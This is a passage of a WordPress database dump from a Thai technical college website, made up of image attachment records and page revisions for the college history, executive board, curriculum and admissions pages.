(969, 3, '2018-02-06 09:40:43', '2018-02-06 02:40:43', '', '6-2-2561 9-39-52', '', 'inherit', 'closed', 'closed', '', '6-2-2561-9-39-52-2', '', '', '2018-02-06 09:40:43', '2018-02-06 02:40:43', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-9-39-52-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(970, 3, '2018-02-06 09:40:45', '2018-02-06 02:40:45', '', '6-2-2561 9-41-23', '', 'inherit', 'closed', 'closed', '', '6-2-2561-9-41-23-2', '', '', '2018-02-06 09:40:45', '2018-02-06 02:40:45', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-9-41-23-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(971, 3, '2018-02-06 09:40:45', '2018-02-06 02:40:45', '', '6-2-2561 9-32-58', '', 'inherit', 'closed', 'closed', '', '6-2-2561-9-32-58-2', '', '', '2018-02-06 09:42:30', '2018-02-06 02:42:30', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-9-32-58-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(972, 3, '2018-02-06 09:40:45', '2018-02-06 02:40:45', '', '6-2-2561 9-34-49', '', 'inherit', 'closed', 'closed', '', '6-2-2561-9-34-49-2', '', '', '2018-02-06 09:44:13', '2018-02-06 02:44:13', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-9-34-49-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(973, 3, '2018-02-06 09:40:46', '2018-02-06 02:40:46', '', '6-2-2561 9-36-58', '', 'inherit', 'closed', 'closed', '', '6-2-2561-9-36-58-2', '', '', '2018-02-06 09:44:50', '2018-02-06 02:44:50', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-9-36-58-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(974, 3, '2018-02-06 09:40:46', '2018-02-06 02:40:46', '', '6-2-2561 9-38-34', '', 'inherit', 'closed', 'closed', '', '6-2-2561-9-38-34-2', '', '', '2018-02-06 09:45:40', '2018-02-06 02:45:40', '', 930, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-9-38-34-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(975, 3, '2018-02-06 09:46:49', '2018-02-06 02:46:49', '<h3> <img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n<h4><img class=\"alignleft wp-image-952\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"1500\" height=\"962\" /></h4>\r\n<h4><img class=\"alignleft wp-image-953\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26-300x204.jpg\" alt=\"\" width=\"1500\" height=\"1020\" /></h4>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"1500\" height=\"1040\" />\r\n\r\n<img class=\" wp-image-971 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-32-58-1.jpg\" alt=\"\" width=\"204\" height=\"110\" />\r\n\r\n<img class=\" wp-image-972 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-34-49-1.jpg\" alt=\"\" width=\"197\" height=\"108\" />\r\n\r\n<img class=\" wp-image-973 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-36-58-1.jpg\" alt=\"\" width=\"195\" height=\"105\" />\r\n\r\n<img class=\"wp-image-974 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-38-34-1.jpg\" alt=\"\" width=\"192\" height=\"103\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-06 09:46:49', '2018-02-06 02:46:49', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(976, 3, '2018-02-06 09:49:41', '2018-02-06 02:49:41', '<h3> <img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n \r\n\r\n \r\n\r\n \r\n<h4><img class=\"wp-image-952 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"1500\" height=\"962\" /></h4>\r\n<h4><img class=\"wp-image-953 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26-300x204.jpg\" alt=\"\" width=\"1500\" height=\"1020\" /></h4>\r\n<img class=\"wp-image-954 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"1500\" height=\"1040\" />\r\n\r\n<img class=\" wp-image-971 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-32-58-1.jpg\" alt=\"\" width=\"204\" height=\"110\" />\r\n\r\n<img class=\" wp-image-972 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-34-49-1.jpg\" alt=\"\" width=\"197\" height=\"108\" />\r\n\r\n<img class=\" wp-image-973 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-36-58-1.jpg\" alt=\"\" width=\"195\" height=\"105\" />\r\n\r\n<img class=\"wp-image-974 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-38-34-1.jpg\" alt=\"\" width=\"192\" height=\"103\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-06 09:49:41', '2018-02-06 02:49:41', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(977, 3, '2018-02-06 09:50:24', '2018-02-06 02:50:24', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-952 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"1500\" height=\"962\" /><img class=\"wp-image-953 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26-300x204.jpg\" alt=\"\" width=\"1500\" height=\"1020\" /><img class=\"wp-image-954 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"1500\" height=\"1040\" /></h4>\r\n<img class=\" wp-image-971 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-32-58-1.jpg\" alt=\"\" width=\"204\" height=\"110\" />\r\n\r\n<img class=\" wp-image-972 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-34-49-1.jpg\" alt=\"\" width=\"197\" height=\"108\" />\r\n\r\n<img class=\" wp-image-973 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-36-58-1.jpg\" alt=\"\" width=\"195\" height=\"105\" />\r\n\r\n<img class=\"wp-image-974 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-38-34-1.jpg\" alt=\"\" width=\"192\" height=\"103\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-06 09:50:24', '2018-02-06 02:50:24', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(978, 3, '2018-02-06 10:33:57', '2018-02-06 03:33:57', '', '6-2-2561 10-21-55', '', 'inherit', 'closed', 'closed', '', '6-2-2561-10-21-55', '', '', '2018-02-06 10:36:08', '2018-02-06 03:36:08', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-10-21-55.jpg', 0, 'attachment', 'image/jpeg', 0),
(979, 3, '2018-02-06 10:33:59', '2018-02-06 03:33:59', '', '6-2-2561 10-32-17', '', 'inherit', 'closed', 'closed', '', '6-2-2561-10-32-17', '', '', '2018-02-06 11:05:41', '2018-02-06 04:05:41', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-10-32-17.jpg', 0, 'attachment', 'image/jpeg', 0),
(980, 3, '2018-02-06 10:34:01', '2018-02-06 03:34:01', '', '6-2-2561 10-33-14', '', 'inherit', 'closed', 'closed', '', '6-2-2561-10-33-14', '', '', '2018-02-06 11:08:36', '2018-02-06 04:08:36', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-10-33-14.jpg', 0, 'attachment', 'image/jpeg', 0),
(981, 3, '2018-02-06 10:34:03', '2018-02-06 03:34:03', '', '6-2-2561 10-34-02', '', 'inherit', 'closed', 'closed', '', '6-2-2561-10-34-02', '', '', '2018-02-06 11:14:22', '2018-02-06 04:14:22', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-10-34-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(982, 3, '2018-02-06 11:17:21', '2018-02-06 04:17:21', '<a href=\"/%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%af/untitled-1-1-2/\"><img class=\"alignnone size-full wp-image-12151\" src=\"/wp-content/uploads/2021/11/Untitled-1-1.jpg\" alt=\"\" width=\"3508\" height=\"2480\" /></a>', '', '', 'publish', 'closed', 'closed', '', '%e0%b8%84%e0%b8%93%e0%b8%b0%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b8%af', '', '', '2021-11-08 09:55:56', '2021-11-08 02:55:56', '', 0, 'http://www.technicrayong.ac.th/?page_id=982', 0, 'page', '', 0),
(984, 3, '2018-02-06 10:49:42', '2018-02-06 03:49:42', '<img class=\"aligncenter wp-image-978 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55.jpg\" alt=\"\" width=\"450\" height=\"492\" />\r\n\r\n<img class=\"aligncenter wp-image-983 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51.jpg\" alt=\"\" width=\"607\" height=\"214\" />', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-02-06 10:49:42', '2018-02-06 03:49:42', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(985, 3, '2018-02-06 11:02:50', '2018-02-06 04:02:50', '', '6-2-2561 10-50-51', '', 'inherit', 'closed', 'closed', '', '6-2-2561-10-50-51-2', '', '', '2018-02-06 11:03:54', '2018-02-06 04:03:54', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-10-50-51-1.jpg', 0, 'attachment', 'image/jpeg', 0),
(987, 3, '2018-02-06 11:04:32', '2018-02-06 04:04:32', '<img class=\"aligncenter wp-image-978 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55.jpg\" alt=\"\" width=\"450\" height=\"492\" />\r\n\r\n<img class=\"aligncenter wp-image-985 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1.jpg\" alt=\"\" width=\"548\" height=\"133\" />\r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-02-06 11:04:32', '2018-02-06 04:04:32', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(988, 3, '2018-02-06 11:07:53', '2018-02-06 04:07:53', '', '6-2-2561 11-09-15', '', 'inherit', 'closed', 'closed', '', '6-2-2561-11-09-15', '', '', '2018-02-06 11:07:53', '2018-02-06 04:07:53', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-11-09-15.jpg', 0, 'attachment', 'image/jpeg', 0),
(989, 3, '2018-02-06 11:10:54', '2018-02-06 04:10:54', '', '6-2-2561 11-12-19', '', 'inherit', 'closed', 'closed', '', '6-2-2561-11-12-19', '', '', '2018-02-06 11:10:54', '2018-02-06 04:10:54', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-11-12-19.jpg', 0, 'attachment', 'image/jpeg', 0),
(990, 3, '2018-02-06 11:13:46', '2018-02-06 04:13:46', '', '6-2-2561 11-15-12', '', 'inherit', 'closed', 'closed', '', '6-2-2561-11-15-12', '', '', '2018-02-06 11:13:46', '2018-02-06 04:13:46', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-11-15-12.jpg', 0, 'attachment', 'image/jpeg', 0),
(991, 3, '2018-02-06 11:15:52', '2018-02-06 04:15:52', '', '6-2-2561 11-17-16', '', 'inherit', 'closed', 'closed', '', '6-2-2561-11-17-16', '', '', '2018-02-06 11:15:52', '2018-02-06 04:15:52', '', 982, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/6-2-2561-11-17-16.jpg', 0, 'attachment', 'image/jpeg', 0),
(992, 3, '2018-02-06 11:16:11', '2018-02-06 04:16:11', '<img class=\"aligncenter wp-image-978 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55.jpg\" alt=\"\" width=\"450\" height=\"492\" />\r\n\r\n<img class=\"aligncenter wp-image-985 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1.jpg\" alt=\"\" width=\"548\" height=\"133\" />\r\n\r\n<img class=\"aligncenter wp-image-979 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-32-17.jpg\" alt=\"\" width=\"439\" height=\"486\" />\r\n\r\n<img class=\"aligncenter wp-image-988 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-09-15.jpg\" alt=\"\" width=\"546\" height=\"132\" />\r\n\r\n<img class=\"aligncenter wp-image-980 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-33-14.jpg\" alt=\"\" width=\"441\" height=\"490\" />\r\n\r\n<img class=\"aligncenter wp-image-989 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-12-19.jpg\" alt=\"\" width=\"728\" height=\"160\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-990 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-15-12.jpg\" alt=\"\" width=\"726\" height=\"160\" />\r\n\r\n<img class=\"aligncenter wp-image-981 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-34-02.jpg\" alt=\"\" width=\"440\" height=\"486\" />\r\n\r\n<img class=\"aligncenter wp-image-991 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-17-16.jpg\" alt=\"\" width=\"793\" height=\"161\" />\r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-02-06 11:16:11', '2018-02-06 04:16:11', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(999, 3, '2018-02-06 13:42:13', '2018-02-06 06:42:13', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-952 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"1500\" height=\"962\" /><img class=\"wp-image-953 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26-300x204.jpg\" alt=\"\" width=\"1500\" height=\"1020\" /><img class=\"wp-image-954 alignnone\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46-300x208.jpg\" alt=\"\" width=\"1500\" height=\"1040\" /></h4>\r\n<img class=\" wp-image-971 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-32-58-1.jpg\" alt=\"\" width=\"204\" height=\"110\" />\r\n\r\n<img class=\" wp-image-972 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-34-49-1.jpg\" alt=\"\" width=\"197\" height=\"108\" />\r\n\r\n<img class=\" wp-image-973 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-36-58-1.jpg\" alt=\"\" width=\"195\" height=\"105\" />\r\n\r\n<img class=\"wp-image-974 alignleft\" src=\"/wp-content/uploads/2018/02/6-2-2561-9-38-34-1.jpg\" alt=\"\" width=\"192\" height=\"103\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-994 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-13-21.jpg\" alt=\"\" width=\"824\" height=\"623\" />\r\n\r\n<img class=\"wp-image-997 size-full aligncenter\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-33-01.jpg\" alt=\"\" width=\"812\" height=\"618\" />\r\n\r\n<img class=\"aligncenter wp-image-998 size-full\" src=\"/wp-content/uploads/2018/02/6-2-2561-13-41-55.jpg\" alt=\"\" width=\"804\" height=\"616\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-06 13:42:13', '2018-02-06 06:42:13', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1000, 1, '2018-02-06 17:25:11', '2018-02-06 10:25:11', '<h2><span style=\"color: #333399;\">เอกสารเผยแพร่</span></h2>\r\n\r\n<hr />\r\n<p style=\"padding-left: 30px;\"><a href=\"/%E0%B8%8A%E0%B8%B8%E0%B8%A1%E0%B8%8A%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%A7%E0%B8%B4%E0%B8%8A/?preview_id=3011&preview_nonce=6c3bfba1dd&_thumbnail_id=-1&preview=true\"><span style=\"color: #ff0000;\">เอกสาร PLC</span></a></p>\r\n\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/%E0%B8%95%E0%B8%B2%E0%B8%A3%E0%B8%B2%E0%B8%87%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9/\">ตารางเรียน-ตารางสอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><a href=\"/%E0%B9%80%E0%B8%AD%E0%B8%81%E0%B8%AA%E0%B8%B2%E0%B8%A3%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3/\"><span style=\"color: #ff0000;\">คู่มือพัฒนาการเรียนการสอน</span></a></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-gF\">แบบฟอร์มสำหรับครูผู้สอน</a></span></pre>\r\n\r\n<hr />\r\n\r\n<pre style=\"padding-left: 30px;\"><span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https://wp.me/P9wTWB-jb\">แบบฟอร์มสำหรับนักเรียนนักศึกษา</a></span></pre>\r\n ', 'งานพัฒนาหลักสูตรและการเรียนการสอน', '', 'publish', 'closed', 'closed', '', '%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%ab%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%aa%e0%b8%b9%e0%b8%95%e0%b8%a3', '', '', '2018-06-18 13:09:11', '2018-06-18 06:09:11', '', 0, 'http://www.technicrayong.ac.th/?page_id=1000', 0, 'page', '', 0),
(1001, 1, '2018-02-06 17:25:11', '2018-02-06 10:25:11', ':P', 'งานหลักสูตร', '', 'inherit', 'closed', 'closed', '', '1000-revision-v1', '', '', '2018-02-06 17:25:11', '2018-02-06 10:25:11', '', 1000, 'http://www.technicrayong.ac.th/1000-revision-v1/', 0, 'revision', '', 0),
(1005, 1, '2018-02-06 17:44:02', '2018-02-06 10:44:02', '', 'Login', '', 'publish', 'closed', 'closed', '', 'login', '', '', '2018-03-14 16:26:20', '2018-03-14 09:26:20', '', 0, 'http://www.technicrayong.ac.th/?p=1005', 3, 'nav_menu_item', '', 0),
(1007, 1, '2018-02-06 18:48:10', '2018-02-06 11:48:10', '', '201802061754_Page_01', '', 'inherit', 'closed', 'closed', '', '201802061754_page_01', '', '', '2018-02-06 18:48:10', '2018-02-06 11:48:10', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201802061754_Page_01.png', 0, 'attachment', 'image/png', 0),
(1008, 1, '2018-02-06 18:48:13', '2018-02-06 11:48:13', '', '201802061754_Page_02', '', 'inherit', 'closed', 'closed', '', '201802061754_page_02', '', '', '2018-02-06 18:48:13', '2018-02-06 11:48:13', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201802061754_Page_02.png', 0, 'attachment', 'image/png', 0),
(1009, 1, '2018-02-06 18:48:16', '2018-02-06 11:48:16', '', '201802061754_Page_03', '', 'inherit', 'closed', 'closed', '', '201802061754_page_03', '', '', '2018-02-06 18:48:16', '2018-02-06 11:48:16', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201802061754_Page_03.png', 0, 'attachment', 'image/png', 0),
(1010, 1, '2018-02-06 18:48:19', '2018-02-06 11:48:19', '', '201802061754_Page_04', '', 'inherit', 'closed', 'closed', '', '201802061754_page_04', '', '', '2018-02-06 18:48:19', '2018-02-06 11:48:19', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201802061754_Page_04.png', 0, 'attachment', 'image/png', 0),
(1011, 1, '2018-02-06 18:48:24', '2018-02-06 11:48:24', '', '201802061754_Page_05', '', 'inherit', 'closed', 'closed', '', '201802061754_page_05', '', '', '2018-02-06 18:48:24', '2018-02-06 11:48:24', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201802061754_Page_05.png', 0, 'attachment', 'image/png', 0),
(1012, 1, '2018-02-06 18:48:28', '2018-02-06 11:48:28', '', '201802061754_Page_06', '', 'inherit', 'closed', 'closed', '', '201802061754_page_06', '', '', '2018-02-06 18:48:28', '2018-02-06 11:48:28', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201802061754_Page_06.png', 0, 'attachment', 'image/png', 0),
(1013, 1, '2018-02-06 18:48:30', '2018-02-06 11:48:30', '', '201802061754_Page_07', '', 'inherit', 'closed', 'closed', '', '201802061754_page_07', '', '', '2018-02-06 18:48:30', '2018-02-06 11:48:30', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201802061754_Page_07.png', 0, 'attachment', 'image/png', 0),
(1014, 1, '2018-02-06 18:48:33', '2018-02-06 11:48:33', '', '201802061754_Page_08', '', 'inherit', 'closed', 'closed', '', '201802061754_page_08', '', '', '2018-02-06 18:48:33', '2018-02-06 11:48:33', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201802061754_Page_08.png', 0, 'attachment', 'image/png', 0),
(1015, 1, '2018-02-06 18:48:37', '2018-02-06 11:48:37', '', '201802061754_Page_09', '', 'inherit', 'closed', 'closed', '', '201802061754_page_09', '', '', '2018-02-06 18:48:37', '2018-02-06 11:48:37', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201802061754_Page_09.png', 0, 'attachment', 'image/png', 0),
(1016, 1, '2018-02-06 18:48:43', '2018-02-06 11:48:43', '', '201802061754_Page_10', '', 'inherit', 'closed', 'closed', '', '201802061754_page_10', '', '', '2018-02-06 18:48:43', '2018-02-06 11:48:43', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201802061754_Page_10.png', 0, 'attachment', 'image/png', 0),
(1017, 1, '2018-02-06 18:48:46', '2018-02-06 11:48:46', '', '201802061754_Page_11', '', 'inherit', 'closed', 'closed', '', '201802061754_page_11', '', '', '2018-02-06 18:48:46', '2018-02-06 11:48:46', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/201802061754_Page_11.png', 0, 'attachment', 'image/png', 0),
(1021, 1, '2018-03-16 07:01:03', '2018-03-16 00:01:03', '<h1><a href=\"/wp-content/uploads/2018/01/-ปวช-2561-e1521158423466.jpg\"><img class=\"aligncenter size-large wp-image-1914\" src=\"/wp-content/uploads/2018/01/-ปวช-2561-e1521158423466-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a></h1>\r\n<h1></h1>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"><span style=\"color: #0000ff;\">ประกาศรายชื่อผู้มีสิทธิ์สอบ</span></h1>\r\n \r\n<h2 style=\"text-align: center;\"><a href=\"https://goo.gl/RGU4eU\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ff0000;\">กดเพื่อเปิดดู</span></a></h2>\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-807 size-full\" src=\"/wp-content/uploads/2018/01/27024291_535295693513290_2564198707510501767_o.jpg\" alt=\"\" width=\"2498\" height=\"656\" />\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_01.png\"><img class=\"aligncenter size-large wp-image-1007\" src=\"/wp-content/uploads/2018/01/201802061754_Page_01-688x1024.png\" alt=\"\" width=\"640\" height=\"953\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_02.png\"><img class=\"aligncenter size-large wp-image-1008\" src=\"/wp-content/uploads/2018/01/201802061754_Page_02-694x1024.png\" alt=\"\" width=\"640\" height=\"944\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_03.png\"><img class=\"aligncenter size-large wp-image-1009\" src=\"/wp-content/uploads/2018/01/201802061754_Page_03-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_04.png\"><img class=\"aligncenter size-large wp-image-1010\" src=\"/wp-content/uploads/2018/01/201802061754_Page_04-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_05.png\"><img class=\"aligncenter size-large wp-image-1011\" src=\"/wp-content/uploads/2018/01/201802061754_Page_05-685x1024.png\" alt=\"\" width=\"640\" height=\"957\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_06.png\"><img class=\"aligncenter size-large wp-image-1012\" src=\"/wp-content/uploads/2018/01/201802061754_Page_06-735x1024.png\" alt=\"\" width=\"640\" height=\"892\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_07.png\"><img class=\"aligncenter size-large wp-image-1013\" src=\"/wp-content/uploads/2018/01/201802061754_Page_07-687x1024.png\" alt=\"\" width=\"640\" height=\"954\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_08.png\"><img class=\"aligncenter size-large wp-image-1014\" src=\"/wp-content/uploads/2018/01/201802061754_Page_08-690x1024.png\" alt=\"\" width=\"640\" height=\"950\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_09.png\"><img class=\"aligncenter size-large wp-image-1015\" src=\"/wp-content/uploads/2018/01/201802061754_Page_09-688x1024.png\" alt=\"\" width=\"640\" height=\"953\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_10.png\"><img class=\"aligncenter size-large wp-image-1016\" src=\"/wp-content/uploads/2018/01/201802061754_Page_10-700x1024.png\" alt=\"\" width=\"640\" height=\"936\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/01/201802061754_Page_11.png\"><img class=\"aligncenter size-large wp-image-1017\" src=\"/wp-content/uploads/2018/01/201802061754_Page_11-681x1024.png\" alt=\"\" width=\"640\" height=\"962\" /></a>', 'วิทยาลัยเทคนิคระยองเปิดรับสมัคร นักเรียน นักศึกษา ปีการศึกษา 2561 หลักสูตร ปวช. ,ปวส. และปริญญาตรี', '', 'inherit', 'closed', 'closed', '', '806-autosave-v1', '', '', '2018-03-16 07:01:03', '2018-03-16 00:01:03', '', 806, 